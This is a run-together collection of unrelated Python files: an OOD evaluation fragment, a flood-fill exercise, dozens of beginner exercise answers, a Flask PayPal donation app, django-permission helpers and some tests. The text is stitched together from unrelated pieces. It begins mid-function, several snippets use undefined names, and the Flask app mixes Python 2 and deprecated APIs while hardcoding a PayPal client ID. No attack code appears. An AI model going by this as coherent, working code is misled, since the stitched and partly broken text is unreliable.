tit=trainame + " on " + fdic['info']['evaldata'] auroc, roc = eval.ComputeROC(oc, showplot,tit) auprc,_=eval.ComputePRC(oc, showplot,tit) ftp=eval.ComputeFP95TP(roc) print('AUROC=',auroc) print("AUPRC=",auprc) print("FPR@95%TPR",ftp) resdic['opcurves'].append(oc) print("\n") return resdic #example if __name__ == "__main__": RunOOD('mnist_on_mnist_ires',['mnist_on_fashion_ires','mnist_on_uninoise_ires','mnist_on_flipv_ires','mnist_on_fliph_ires'],3000,False) whoophee/DCP # Given a 2-D matrix representing an image, a location of a pixel in the screen # and a color C, replace the color of the given pixel and all adjacent same colored # pixels with C. # For example, given the following matrix, and location pixel of (2, 2), and 'G' # for green: # B B W # W W W # W W W # B B B # Becomes # B B G # G G G # G G G # B B B #### def adjacent_coords(coord, m, n): ret = [] x, y = coord ret += [(x-1, y)] if x-1 >= 0 else [] ret += [(x, y-1)] if y-1 >= 0 else [] ret += [(x+1, y)] if x+1 < m else [] ret += [(x, y+1)] if y+1 < n else [] return ret def recolor(mat, loc, new_colour): m = len(mat) n = len(mat[0]) colour = mat[loc[0]][loc[1]] st = [loc] visited = set() # BFS using adjacent coordinates. while st: cur = st.pop(0) # if already visited, ignore if cur in visited: continue # recolour and mark as visited mat[cur[0]][cur[1]] = new_colour visited.add(cur) for x, y in adjacent_coords(cur, m, n): if mat[x][y] == colour: st.append((x, y)) #### def disp(a): print() for x in a: print(' '.join(x)) a = [['B', 'B', 'W'], ['W', 'W', 'W'], ['W', 'W', 'W'], ['B', 'B', 'B']] disp(a) recolor(a, (2, 2), 'G') disp(a) tests/tcustommodulename.py1000+ # The _mycustommodulename module is built from custommodulename.nim file import _mycustommodulename assert(_mycustommodulename.hello() == 5) assert(_mycustommodulename.__doc__ == """This is the doc for my module""") # -------------------------------------------- print("Learn Python to be great!") # -------------------------------------------- print('We learn Python!') # -------------------------------------------- print("Alice's Adventures in Wonderland") # -------------------------------------------- print("2 + 2 = 4") # -------------------------------------------- result = ["O X X", "O X O", "X O X"] print(*result, sep="\n") # -------------------------------------------- print("first\nsecond\nthird") # -------------------------------------------- print("* * * *") print("* *\n" * 2 + "* * * *") # -------------------------------------------- # prints "ok" without quotes print('ok') # -------------------------------------------- # print(1 + 2 + 3 + 6) print(1 + 3 + 3) # print(1 + 2 + 3) # -------------------------------------------- print(10) # -------------------------------------------- for i in range(1, 11): print(i, end=' ') # -------------------------------------------- print(type('int')) print(type(394)) print(type(2.71)) # -------------------------------------------- print("""' '"' '"'"' '"'"'"'""") # -------------------------------------------- print('"""\nTHIS IS A STRING\n"""') # -------------------------------------------- print("""Did that stop the old Grinch? No! The Grinch simply said, "If I can't find a reindeer, I'll make one instead!\"""") # -------------------------------------------- number = 1 * 1 * 10 ** 1 # -------------------------------------------- holiday = 'Cinnamon Roll Day' # -------------------------------------------- print(1234567890 * 987654321 + 67890) # -------------------------------------------- a = int(input()) b = int(input()) c = int(input()) r = a * b - c print(r) # -------------------------------------------- n = int(input()) r = n r += n r *= n r -= n r //= n print(r) # -------------------------------------------- word = input() print(word * 2) # -------------------------------------------- n = 12345 print(str(n) * 100) # -------------------------------------------- http_response = 'mocked response' http_error = 404 # -------------------------------------------- str_ = "Hello" str_ = str_ + str(10) # -------------------------------------------- str_ = "Hello" str_ = str_ + str(10) # -------------------------------------------- favfl = {'Alex': 'field flowers', 'Kate': 'daffodil', 'Eva': 'artichoke flower', 'Daniel': 'tulip', 'Alice': 'orchid'} print(favfl) # -------------------------------------------- name = ['Helen'] print(name) # -------------------------------------------- list_ = list(input()) print(list_) # -------------------------------------------- jack_age = int(input()) alex_age = int(input()) lana_age = int(input()) ages = [jack_age, alex_age, lana_age] print(min(ages)) # -------------------------------------------- x = int(input()) y = int(input()) print(min(x, y)) # -------------------------------------------- word1 = input() word2 = input() words = [word1, word2] len_words = list(map(len, words)) print(max(len_words)) # -------------------------------------------- def get_sum(a, b): return a + b # -------------------------------------------- def closest_mod_5(x): mod = x % 5 if mod == 0: return x return x + (5 - x % 5) # -------------------------------------------- def captain_adder(name): print('captain', name) # -------------------------------------------- user_city = "Istanbul" def change_city(new_user_city): global user_city user_city = new_user_city change_city("Paris") print(user_city) # -------------------------------------------- x, y, z = [int(x) for x in [input(), input(), input()]] print(x + y + z) # -------------------------------------------- a, b = [int(input()) for i in range(2)] print(a - b) # -------------------------------------------- n = int(input()) word = input() print(n * word) # -------------------------------------------- n, k = (int(input()) for i in range(2)) k //= n print(k) # -------------------------------------------- n = list(input()) for i in enumerate(n): n[i[0]] = int(i[1]) print(sum(n)) # -------------------------------------------- n = [int(input()) for i in range(3)] print(sum((i // 2 + i % 2) for i in n)) # -------------------------------------------- a = int(input().strip()) print(a > 0) # -------------------------------------------- n, k, v = (int(input()) for i in range(3)) tk = n * k print(v <= tk) # -------------------------------------------- A, B = (int(input()) for i in range(2)) odd = A / B odd = not odd % 2 == 0 print(odd) # -------------------------------------------- word = input() n = len(word) print(f'{word} has {n} letters') # -------------------------------------------- income = int(input()) if 0 <= income <= 15527: percent = 0 elif 15528 <= income <= 42707: percent = 15 elif 42708 <= income <= 132406: percent = 25 else: percent = 28 calculated_tax = income * percent / 100 print(f'The tax for {income} is {percent}%. That is {round(calculated_tax)} dollars!') # -------------------------------------------- word = input() dictionary = ["aa", "abab", "aac", "ba", "bac", "baba", "cac", "caac"] if word in dictionary: print("Correct") else: print("Incorrect") # -------------------------------------------- year = int(input()) if (year % 4 == 0 and year % 100 != 0) or year % 400 == 0: print("Leap") else: print("Ordinary") # -------------------------------------------- i = float(input()) if i < 2: print('Analytic') elif i <= 3: print('Synthetic') else: print('Polysynthetic') # -------------------------------------------- a, b, h = (int(input()) for i in range(3)) if h < a: print("Deficiency") elif h > b: print("Excess") else: print("Normal") # -------------------------------------------- spin, charge = (input() for i in range(2)) class_ = 'Quark' if spin == '1': particle = 'Photon' class_ = 'Boson' elif charge == '0': particle = 'Muon' class_ = 'Lepton' elif charge == '-1': particle = 'Electron' class_ = 'Lepton' elif charge == '2/3': particle = 'Charm' elif charge == '-1/3': particle = 'Strange' print(f'{particle} {class_}') # -------------------------------------------- k = int(input()) print((k * (k + 1)) // 2) # -------------------------------------------- n = int(input()) i = 2 while i < n: print(i) i += 2 # -------------------------------------------- string = "red yellow fox bite orange goose beeeeeeeeeeep" vowels = 'aeiou' count = 0 for letter in string: if letter in vowels: count += 1 # -------------------------------------------- count = int(input()) sum_ = 0 for _ in range(count): sum_ += int(input()) print(sum_ / count) # -------------------------------------------- word = input() for char in word: if char.isupper(): word = word.replace(char, '_' + char.lower()) print(word) # -------------------------------------------- consonants = 'bcdfghjklmnpqrstvwxyz' vowels = 'aeiou' sequence = input() for char in sequence: if char in vowels: print('vowel') elif char in consonants: print('consonant') else: break # -------------------------------------------- supremus_cat_cafe = ['', 0] while True: cafe = input().split() if cafe[0] == 'MEOW': break if int(cafe[1]) >= supremus_cat_cafe[1]: supremus_cat_cafe[1] = int(cafe[1]) supremus_cat_cafe[0] = cafe[0] print(supremus_cat_cafe[0]) # -------------------------------------------- from math import factorial x = int(input()) print(factorial(x)) # -------------------------------------------- import string print(string.digits + '\n' + string.ascii_lowercase) # -------------------------------------------- from random import seed, randint n = int(input()) seed(a=n, version=2) print(randint(-100, 100)) # -------------------------------------------- import random random.seed(int(input())) print(random.choice('Voldemort')) # -------------------------------------------- import random random.seed(3) print(random.betavariate(0.9, 0.1)) # -------------------------------------------- import random sentence = input().split() random.seed(43) random.shuffle(sentence) print(' '.join(sentence)) # -------------------------------------------- class Angel: color = "white" feature = "wings" home = "Heaven" class Demon: color = "red" feature = "horns" home = "Hell" little_angel = Angel() little_demon = Demon() little_kids = (little_angel, little_demon) for kid in little_kids: print(f'{kid.color}\n{kid.feature}\n{kid.home}') # -------------------------------------------- class Human: species = 'Homo Sapiens' n_legs = 2 n_arms = 2 # -------------------------------------------- class RockBand: genre, n_members, key_instruments = 'rock', 4, ['electric guitar', 'drums'] tampikos = RockBand() print(f'{tampikos.genre}\n{tampikos.n_members}\n{tampikos.key_instruments}') # -------------------------------------------- class Store: def __init__(self, name, category): self.name = name self.category = category shop = Store("GAP", "clothes") print(shop.name, shop.category) # -------------------------------------------- class Movie: def __init__(self, title, director, year): self.title, self.director, self.year = title, director, year titanic, star_wars, fight_club = (Movie('Titanic', '', '1997'), Movie('Star Wars', '', '1977'), Movie('Fight Club', '', '1999')) # -------------------------------------------- class Student: def __init__(self, name, last_name, birth_year): self.name, self.last_name, self.birth_year = name, last_name, birth_year self.id = f'{name[0]}{last_name}{birth_year}' n, ln, by = (input() for i in range(3)) student = Student(n, ln, by) print(student.id) # -------------------------------------------- class Mountain: def __init__(self, name, height): self.name = name self.height = height def convert_height(self): return self.height / 0.3048 # -------------------------------------------- class Hexagon: def __init__(self, side_length): self.side_length = side_length def get_area(self): return round((3 * math.sqrt(3) * self.side_length ** 2) / 2, 3) # -------------------------------------------- class Point: def __init__(self, xx, yy): self.xx = xx self.yy = yy def dist(self, another_instance): return math.sqrt((self.xx - another_instance.xx) ** 2 + (self.yy - another_instance.yy) ** 2) # -------------------------------------------- class House: def __init__(self, floors): self.floors = floors self.color = None def paint(self, color): self.color = color # -------------------------------------------- class Stack(): def __init__(self): self.my_stack = [] def push(self, el): self.my_stack.append(el) def pop(self): delete = self.peek() self.my_stack.remove(delete) return delete def peek(self): return self.my_stack[-1] def is_empty(self): return bool(not self.my_stack) # -------------------------------------------- class PiggyBank: def __init__(self, dollars, cents): self.dollars = dollars self.cents = cents def add_money(self, deposit_dollars, deposit_cents): self.dollars += deposit_dollars self.cents += deposit_cents while self.cents > 99: self.cents -= 100 self.dollars += 1 piggy1 = PiggyBank(2, 2) def create_piggy(dollars, cents): return {'dollars': dollars, 'cents': cents} piggy2 = create_piggy(2, 2) # -------------------------------------------- print(' \n'.join('You are the best programmer!'.split())) # -------------------------------------------- print(len('That is \n mine')) # -------------------------------------------- print('\\\\') # -------------------------------------------- print(str(45 / 9 + 16 * (5 + 8))) print('mathematics') # -------------------------------------------- print(""" I am = I'm I have = I've I will = I'll I had / would = I'd """) # -------------------------------------------- print("What would I watch tonight?") fave_tv_show = 'Re:ゼロ' my_answer = fave_tv_show # -------------------------------------------- age = 20 if age < 18: print("You can't watch Game of Thrones!") else: print("You are welcome to be here. Sit, have a drink and enjoy the show!") # -------------------------------------------- print(input().upper()) # -------------------------------------------- print(input().strip(',.!?').lower()) # -------------------------------------------- marks = ',.!?' preprocess = ''.join(list(filter(lambda x: x not in marks, input()))) print(preprocess.lower()) # -------------------------------------------- def create_full_name(name, last_name): return f'{name} {last_name}' name1, last_name1 = "John", "Lennon" full_name1 = create_full_name(name1, last_name1) name2, last_name2 = "Hermione", "Granger" full_name2 = create_full_name(name2, last_name2) name3, last_name3 = "Lady", "Gaga" full_name3 = create_full_name(name3, last_name3) # -------------------------------------------- def f1(x): return x ** 2 + 1 def f2(x): return 1 / x ** 2 def f3(x): return x ** 2 - 1 def f(x): if x <= 0: return f1(x) if 0 < x < 1: return f2(x) return f3(x) # -------------------------------------------- def fahrenheit_to_celsius(temps_f): temps_c = (temps_f - 32) * 5 / 9 return round(temps_c, 2) def celsius_to_fahrenheit(temps_c): temps_f = temps_c * 9 / 5 + 32 return round(temps_f, 2) def main(): """Entry point of the program.""" temperature, unit = input().split() # read the input temperature = float(temperature) if unit == 'F': print(f'{fahrenheit_to_celsius(temperature)} C') else: print(f'{celsius_to_fahrenheit(temperature)} F') # -------------------------------------------- hand = [input() for i in range(6)] face_cards = {'Jack': 11, 'Queen': 12, 'King': 13, 'Ace': 14} rank = 0 for card in hand: if card not in face_cards: rank += int(card) else: rank += face_cards[card] rank /= 6 print(rank) # -------------------------------------------- words = input().lower().split() word_amount = dict() for word in words: if word not in word_amount: word_amount[word] = 1 else: word_amount[word] += 1 for word, count in word_amount.items(): print(f'{word} {count}') # -------------------------------------------- f, s = (float(input()) for i in range(2)) print('{}'.format(f + s)) # -------------------------------------------- x, y = input().split() print(f'{x} of {y}') # -------------------------------------------- random_numbers = [1, 22, 333, 4444, 55555] for index, random in enumerate(random_numbers): random_numbers[index] = str(random) print("\n".join(random_numbers)) # -------------------------------------------- random_numbers = [1, 22, 333, 4444, 55555] print("\n".join(map(str, random_numbers))) # -------------------------------------------- print(''.join([word.title() for word in input().lower().split('_')])) # -------------------------------------------- # safe_main_module.py name = "Juan" def main(): print("Hello,", name) if __name__ == "__main__": main() # -------------------------------------------- import datetime birthday = datetime.datetime(2002, 5, 27) # -------------------------------------------- some_date = datetime.datetime(3486, 5, 15, 23, 59) print(some_date.time()) # -------------------------------------------- import datetime now_time = datetime.datetime.now() # -------------------------------------------- import math def my_sqrt(value): if isinstance(value, str): return "The string should be converted into a numeric data type" if not isinstance(value, (int, float)): return None return math.sqrt(value) # -------------------------------------------- file = open('test_file.txt', 'r', encoding='utf-16') print(file.readline()) file.close() # -------------------------------------------- # First letter from each line. file = open('test.txt', 'r') for line in file: print(line[0]) file.close() # -------------------------------------------- file = open('sums.txt', 'r') for line in file: numbers = line.strip('\n').split() for i, number in enumerate(numbers): numbers[i] = int(number) print(sum(numbers)) file.close() # -------------------------------------------- file = open('sums.txt', 'r') for line in file: print(sum(int(x) for x in line.split())) file.close() # -------------------------------------------- file = open('input.txt', 'w', encoding='utf-8') file.write(input()) file.close() # -------------------------------------------- with open('input.txt', 'w') as f: f.write(input()) # -------------------------------------------- with open('planets.txt', 'w', encoding='utf-8') as file: planets = ['Mercury', 'Venus', 'Earth', 'Mars', 'Jupiter', 'Saturn', 'Uranus', 'Neptune'] for planet in planets: file.write(planet + '\n') # -------------------------------------------- with open('animals.txt') as file: animals = file.readlines() animals = [animal.replace('\n', '') for animal in animals] new_file = open('animals_new.txt', 'w') new_file.write(' '.join(animals)) new_file.close() # -------------------------------------------- with open('test.txt', 'w') as f: f.write('Tada!') # -------------------------------------------- with open('name.txt') as f1, open('surname.txt') as f2, open('full_name.txt', 'w') as f3: name = f1.read() surname = f2.read() full_name = name + ' ' + surname f3.write(full_name) # -------------------------------------------- for i in range(1, 11): with open(f'file{i}.txt', 'w') as file: file.write(str(i)) # -------------------------------------------- import json colors = {"rainbow": ["red", "orange", "yellow", "green", "blue", "indigo", "violet"], "CMYK": ["cyan", "magenta", "yellow", "key color"], "RBG": ["red", "blue", "green"]} json_colors = json.dumps(colors, indent=4) with open('colors.json', 'w') as json_file: json_file.write(json_colors) # -------------------------------------------- import json colors = {"rainbow": ["red", "orange", "yellow", "green", "blue", "indigo", "violet"], "CMYK": ["cyan", "magenta", "yellow", "key color"], "RBG": ["red", "blue", "green"]} with open("colors.json", "w") as file: json.dump(colors, file) # -------------------------------------------- import json json_string = input() json_dict = json.loads(json_string) print(f'{type(json_dict)}\n{json_dict}') # -------------------------------------------- with open('users.json', 'r') as json_file: dict_from_json = json.load(json_file) users_defined = len(dict_from_json['users']) print(users_defined) # -------------------------------------------- template = """

{{ blog_name }}

""" # -------------------------------------------- template = """
    {% for todo in todos %}
  • {{ todo }}
  • {% endfor %}
""" # -------------------------------------------- template = """
{% if post.author != None %} {{ post.text }} {% else %} No author {% endif %}
""" # -------------------------------------------- add_book(title='SAO') # -------------------------------------------- def get_bonus(salary, percentage=35): return int(salary * percentage / 100) # -------------------------------------------- def get_percentage(real, round_digits=None): percentage = real * 100 return f'{round(percentage, round_digits)}%' # -------------------------------------------- shopping_list = [] shopping_list.append("milk") shopping_list.append("olive oil") shopping_list.append("bananas") shopping_list.remove("milk") shopping_list.append("brownie") # -------------------------------------------- shopping_list = [] shopping_list.append('milk') shopping_list.append('olive oil') shopping_list.append('bananas') shopping_list[0] = 'brownie' # -------------------------------------------- n = int(input()) list_ = [int(input()) for _i in range(n)] print(list_) # -------------------------------------------- from django.shortcuts import redirect, Http404 from django.views import View class TodoView(View): all_todos = [] def delete(self, request, to_do, *args, **kwargs): if to_do not in self.all_todos: raise Http404 self.all_todos.remove(to_do) return redirect('/') # -------------------------------------------- from django.shortcuts import redirect from django.views import View class TodoView(View): all_todos = [] def post(self, request, *args, **kwargs): to_do = request.POST.get('todo') if to_do not in self.all_todos: self.all_todos.append(to_do) return redirect('/') # -------------------------------------------- from django.shortcuts import redirect from django.views import View class TodoView(View): all_todos = [] def post(self, request, *args, **kwargs): to_do = request.POST.get('todo') is_important = request.POST.get('important') if to_do not in self.all_todos: self.all_todos.insert(0, to_do) if is_important else self.all_todos.append(to_do) return redirect('/') # -------------------------------------------- from django.shortcuts import redirect from django.views import View class TodoView(View): all_todos = [] def post(self, request, *args, **kwargs): to_do = request.POST.get('todo') is_important = request.POST.get('important') if to_do not in self.all_todos: if is_important: self.all_todos.insert(0, to_do) else: self.all_todos.append(to_do) return redirect('/') # -------------------------------------------- prices = input().split() print(prices[3 - 1]) # -------------------------------------------- numbers = [4, 1, 0, 3, 2, 5] for i, _ in enumerate(numbers): numbers[i] = i print(numbers) # -------------------------------------------- numbers = tuple(int(n) for n in input().split()) print(numbers[-1]) # -------------------------------------------- oceans = ['Atlantic', 'Pacific', 'Indian', 'Southern', 'Arctic'] oceans = tuple(oceans) # -------------------------------------------- singleton = ([0, 1, 1, 2, 3, 5, 8, 13, 21],) # -------------------------------------------- print(sum(ord(input()) for _ in range(2))) # -------------------------------------------- print(''.join(chr(int(input())) for _ in range(4))) # -------------------------------------------- code = int(input()) print(chr(code) if 32 <= code <= 126 else False) # -------------------------------------------- zero_bytes = bytes(5) # -------------------------------------------- str_to_bytes = input().encode() print(str_to_bytes[-1]) # -------------------------------------------- message = input().encode() key = sum((int(input())).to_bytes(2, byteorder='big')) decoded = '' for character in message: decoded += chr(character + key) print(decoded) # -------------------------------------------- message = input().encode() key = sum((int(input())).to_bytes(2, byteorder='big')) decoded = ''.join(map(lambda x: chr(x + key), message)) print(decoded) # -------------------------------------------- import socket # Create socket. client_socket = socket.socket() # Address. hostname = 'localhost' port = 7070 address = (hostname, port) # Connect to server. client_socket.connect(address) # Prepare data. data = 'Neko' # Convert to bytes. data = data.encode() # Send data through socket. client_socket.send(data) # Receive the response. response = client_socket.recv(1024) # Decode bytes to string. response = response.decode() print(response) client_socket.close() # -------------------------------------------- import socket # Socket as a context manager. with socket.socket() as client_socket: hostname = '127.0.0.1' port = 9090 address = (hostname, port) client_socket.connect(address) data = 'Neko' data = data.encode() client_socket.send(data) response = client_socket.recv(1024) response = response.decode() print(response) # -------------------------------------------- import sys args = sys.argv # List of arguments. if len(args) != 3: print("The script should be called with two arguments, the first and the second number to be multiplied") else: first_num = float(args[1]) second_num = float(args[2]) product = first_num * second_num print("The product of " + args[1] + " times " + args[2] + " equals " + str(product)) # -------------------------------------------- my_list = args[1:] my_list = [int(i) for i in my_list] print(my_list) # -------------------------------------------- deposit = int(input()) years = 0 while deposit <= 700000: deposit += deposit * 0.071 years += 1 print(years) # -------------------------------------------- def my_function(x): return -1 if x < 0 else 1 # -------------------------------------------- lambda x: -1 if x < 0 else 1 # -------------------------------------------- func = (lambda x: 'even' if x % 2 == 0 else 'odd') # -------------------------------------------- a = 1 b = 2 c = 3 func = (lambda a, b, c: (a + b) * c) result = func(a, b, c) # -------------------------------------------- numbers = [int(n) for n in input()] less_than_5 = [n for n in numbers if n < 5] greater_than_5 = [n for n in numbers if n > 5] print(less_than_5) print(greater_than_5) # -------------------------------------------- digits = [int(n) for n in input() if int(n) % 2 == 1] print(digits) # -------------------------------------------- numbers = [int(n) for n in input()] running = [] accumulated = 0 for _, n in enumerate(numbers): running.append(n + accumulated) accumulated += n print(running) # -------------------------------------------- numbers = [int(n) for n in input()] running = [sum(numbers[0:i + 1]) for i in range(len(numbers))] print(running) # -------------------------------------------- def celsius_to_fahrenheit(c): return ((c + 40) * 1.8) - 40 daily_temp_c = [20.5, 19, 15, 25, 27, 30, 31, 29, 26, 21, 19, 25, 27.5, 28, 26, 29.5, 31, 27.5, 26, 29, 18, 17.5, 17, 16.5, 19, 20, 25, 26.5, 27, 28, 20.5, 19, 25, 27.5, 28, 26, 15, 25, 27, 28] daily_temp_f = list(map(celsius_to_fahrenheit, daily_temp_c)) temp_above_80 = list(filter(lambda x: x > 80, daily_temp_f)) print(len(temp_above_80)) # -------------------------------------------- scores_maths = [100, 75, 90, 95, 60, 50, 95, 85, 70, 75, 90, 85, 60, 45, 100, 70, 65, 50, 55, 95, 50, 45, 35, 100, 95, 90, 85, 90, 80, 85, 95, 45, 60, 45, 80, 70, 55, 45, 60, 90] scores_physics = [50, 65, 85, 100, 60, 55, 90, 85, 70, 90, 50, 40, 100, 45, 95, 70, 75, 60, 50, 100, 60, 90, 40, 90, 95, 90, 80, 95, 85, 80, 95, 90, 75, 50, 80, 70, 50, 35, 65, 90] scores_english = [50, 40, 100, 45, 95, 70, 75, 60, 50, 100, 50, 45, 35, 100, 95, 90, 85, 90, 80, 85, 90, 85, 60, 45, 100, 70, 65, 50, 55, 95, 50, 65, 85, 100, 60, 55, 90, 85, 70, 90] overall_scores = list(map(lambda x, y, z: x + y + z, scores_maths, scores_physics, scores_english)) admitted_students = list(filter(lambda x: x >= 270, overall_scores)) print(len(admitted_students)) # -------------------------------------------- even = [0, 2, 4, 6, 8] odd = [1, 3, 5, 7, 9] length = len(even) my_sum = [] i = 0 while i < length: my_sum.append(even[i] + odd[i]) i = i + 1 remainders = [x % 3 for x in my_sum] nonzero_remainders = [r for r in remainders if r] # -------------------------------------------- even = [0, 2, 4, 6, 8] odd = [1, 3, 5, 7, 9] my_sum = list(map(lambda x, y: x + y, even, odd)) remainders = list(map(lambda x: x % 3, my_sum)) nonzero_remainders = list(filter(lambda r: r, remainders)) # -------------------------------------------- numbers = [1, 2, 3] my_generator = (n ** 2 for n in numbers) print(next(my_generator)) # Outputs 1 print(next(my_generator)) # Outputs 4 print(next(my_generator)) # Outputs 9 my_list = [n ** 2 for n in numbers] print(my_list) # Outputs [1, 4, 9] my_generator = (n ** 2 for n in numbers) for n in my_generator: print(n) # Outputs # 1 # 4 # 9 # -------------------------------------------- n = int(input()) def squares(times): i = 1 while i <= times: yield i ** 2 i += 1 _squares = squares(n) for n in _squares: print(n) # -------------------------------------------- n = int(input()) def even(evens): i = 0 while i < evens: yield i * 2 i += 1 _evens = even(n) for n in _evens: print(n) # -------------------------------------------- for a, b in zip(v1, v2): x = a + b print(x) # -------------------------------------------- for e_word, s_word, f_word in zip(english, spanish, french): print(e_word, s_word, f_word) # -------------------------------------------- word_1, word_2 = (input() for i in range(2)) brand_name = '' for letter_1, letter_2 in zip(word_1, word_2): brand_name += letter_1 + letter_2 print(brand_name) # -------------------------------------------- import itertools for first_name, middle_name in itertools.product(first_names, middle_names): print(first_name, middle_name) # -------------------------------------------- import itertools teams = ['Best-ever', 'Not-so-good', 'Amateurs'] for plays in itertools.combinations(teams, 2): print(plays) # -------------------------------------------- from itertools import combinations flower_names = ['rose', 'tulip', 'sunflower'] for r in range(1, 4): for bouquets in combinations(flower_names, r): print(bouquets) # -------------------------------------------- # -------------------------------------------- #!/usr/bin/python from flask import Flask, session, render_template, url_for, redirect, request, flash, g from flask.ext import assets import pyxb import json import json import os import paypalrestsdk app = Flask(__name__) paypal_client_id = "AacMHTvbcCGRzaeuHY6i6zwqGvveuhN4X_2sZ2mZJi76ZGtSZATh7XggfVuVixzyrRuG-bJTLOJIXltg" paypal_client_secret = "" #Assets env = assets.Environment(app) env.load_path = [ os.path.join(os.path.dirname(__file__), 'assets') ] env.register ( 'js_all', assets.Bundle( 'js/jquery.js', 'js/bootstrap.min.js', 'js/moment-with-locales.min.js', 'js/bootstrap-datetimepicker.min.js', 'js/slider.js', 'js/amounts.js', 'js/landing.js', output='js_all.js' ) ) env.register( 'css_all', assets.Bundle( 'css/bootstrap.min.css', 'css/bootstrap-datetimepicker.min.css', 'css/slider.css', 'css/landing-page.css', output='css_all.css' ) ) # Paypal lib paypalrestsdk.configure( mode="sandbox", # sandbox or live client_id=paypal_client_id, client_secret= paypal_client_secret ) @app.route('/') def index(): return render_template('index.html') @app.route('/payment/donation/create', methods=["POST"]) def paypal_process(): amount = 0 categories = { 'amount-homeless': 'homeless people', 'amount-refugees': 'refugees people', 'amount-orphans': 'orphans people', 'amount-poverished': 'perverished people' } items = [] for key, value in categories.iteritems(): amount += float(request.form[key]) if request.form[key] != 0: items.append({ "name": "Donation to " + value, "price": "%.2f" % float(request.form[key]), "currency": "GBP", "quantity": 1 }) if amount == 0: raise Exception("Invalid amount") # Payment # A Payment Resource; create one using # the above types and intent as 'sale' payment = paypalrestsdk.Payment({ "intent": "sale", # Payer # A resource representing a Payer that funds a payment # Payment Method as 'paypal' "payer": { "payment_method": "paypal"}, # Redirect URLs "redirect_urls": { "return_url": "http://localhost:5000/payment/donation/done", "cancel_url": "http://localhost:5000/"}, # Transaction # A transaction defines the contract of a # payment - what is the payment for and who # is fulfilling it. "transactions": [{ # ItemList "item_list": { "items": items }, # Amount # Let's you specify a payment amount. "amount": { "total": "%.2f" % amount, "currency": "GBP" }, "description": "Donation to Railaid" }] }) print(payment) # Create Payment and return status if payment.create(): print("Payment[%s] created successfully" % (payment.id)) # Redirect the user to given approval url for link in payment.links: if link.method == "REDIRECT": # Convert to str to avoid google appengine unicode issue # https://github.com/paypal/rest-api-sdk-python/pull/58 redirect_url = str(link.href) return redirect(redirect_url) else: print(payment.error) @app.route('/payment/donation/done') def paypal_success(): # Don't know what to do with it for now payment_id = request.args.get('paymentId') payment = paypalrestsdk.Payment.find(payment_id) print(payment.transactions[0].amount.total); return "Thank you for your donation of " + payment.transactions[0].amount.total + "!" # @app.route('/search/tickets') # def search_tickets(): # p1 = Passenger(age=30) # # tp1 = TravelPoint( # origin="GBQQU", # destination="GBQQM", # departure=datetime(2015, 11, 23, 8)) # # fq = FareSearch( # travel_points = [tp1], # fare_filter = FARE_FILTER.CHEAPEST, # passengers = [p1]) # # fares_result = sc.search_fare(fq) # fr = fares_result.results # print(fr) # return render_template('search-result.html', data=fr) if __name__ == '__main__': app.run(debug=True) from fastapi import FastAPI,Request from fastapi.testclient import TestClient from app.main import app client = TestClient(app) def test_health(): response = client.get("/users/health-check") assert response.status_code == 200 assert response.json() == {"Message":'healthy user endpoint'}dkopitsa/django-permission # coding=utf-8 """ Permission logic utilities """ from __future__ import unicode_literals from permission.logics import PermissionLogic def add_permission_logic(model, permission_logic): """ Add permission logic to the model Parameters ---------- model : django model class A django model class which will be treated by the specified permission logic permission_logic : permission logic instance A permission logic instance which will be used to determine permission of the model Examples -------- >>> from django.db import models >>> from permission.logics import PermissionLogic >>> class Mock(models.Model): ... name = models.CharField('name', max_length=120) >>> add_permission_logic(Mock, PermissionLogic()) """ if not isinstance(permission_logic, PermissionLogic): raise AttributeError( '`permission_logic` must be an instance of PermissionLogic') if not hasattr(model, '_permission_logics'): model._permission_logics = set() if not hasattr(model, '_permission_handler'): from permission.utils.handlers import registry # register default permission handler registry.register(model, handler=None) model._permission_logics.add(permission_logic) # store target model to the permission_logic instance permission_logic.model = model def remove_permission_logic(model, permission_logic, fail_silently=True): """ Remove permission logic to the model Parameters ---------- model : django model class A django model class which will be treated by the specified permission logic permission_logic : permission logic class or instance A permission logic class or instance which will be used to determine permission of the model fail_silently : boolean If `True` then do not raise KeyError even the specified permission logic have not registered. Examples -------- >>> from django.db import models >>> from permission.logics import PermissionLogic >>> class Mock(models.Model): ... name = models.CharField('name', max_length=120) >>> logic = PermissionLogic() >>> add_permission_logic(Mock, logic) >>> remove_permission_logic(Mock, logic) """ if not hasattr(model, '_permission_logics'): model._permission_logics = set() if not isinstance(permission_logic, PermissionLogic): # remove all permission logic of related remove_set = set() for _permission_logic in model._permission_logics: if _permission_logic.__class__ == permission_logic: remove_set.add(_permission_logic) # difference model._permission_logics = model._permission_logics.difference(remove_set) else: if fail_silently and permission_logic not in model._permission_logics: pass else: model._permission_logics.remove(permission_logic) dustindall/footings import pytest from footings.scenario_registry import ( ScenarioRegistry, def_attribute, scenario_registry, ) class TestScenarioRegistry: @scenario_registry class Scenarios: sens_1 = def_attribute(default=1, dtype=int, description="Sensitivity 1") sens_2 = def_attribute(default=2, dtype=int, description="Sensitivity 2") def test_init(self): assert isinstance(self.Scenarios, ScenarioRegistry) assert self.Scenarios.sens_1 == 1 assert self.Scenarios.sens_2 == 2 assert list(self.Scenarios.registry.keys()) == ["base"] def test_register(self): @self.Scenarios.register class update_1: sens_1 = 2 @self.Scenarios.register class update_2: sens_2 = 3 @self.Scenarios.register class update_3: sens_1 = 2 sens_2 = 3 assert list(self.Scenarios.registry.keys()) == [ "base", "update_1", "update_2", "update_3", ] with pytest.raises(TypeError): @self.Scenarios.register class update_4: sens_1 = 2 sens_2 = 3 sens_3 = 4 with pytest.raises(TypeError): @self.Scenarios.register class update_5: sens_1 = "hello" def test_get(self): assert self.Scenarios.get("base") == {"sens_1": 1, "sens_2": 2} assert self.Scenarios.get("update_1") == {"sens_1": 2, "sens_2": 2} assert self.Scenarios.get("update_2") == {"sens_1": 1, "sens_2": 3} assert self.Scenarios.get("update_3") == {"sens_1": 2, "sens_2": 3} def test_scenario_keys(self): assert list(self.Scenarios.scenario_keys()) == [ "base", "update_1", "update_2", "update_3", ] def test_scenario_items(self): assert self.Scenarios.scenario_items() == { "base": {"sens_1": 1, "sens_2": 2}, "update_1": {"sens_1": 2, "sens_2": 2}, "update_2": {"sens_1": 1, "sens_2": 3}, "update_3": {"sens_1": 2, "sens_2": 3}, } def test_doc(self): pass politics/models/bill.py from . import db, ma class Bill(db.Model): id = db.Column(db.Integer, primary_key=True) assembly_id = db.Column(db.Integer) name = db.Column(db.String(120)) status = db.Column(db.String(30)) sponser = db.Column(db.String(50)) proposed_date = db.Column(db.DateTime) decision_date = db.Column(db.DateTime) is_processed = db.Boolean() def __repr__(self): return self.name 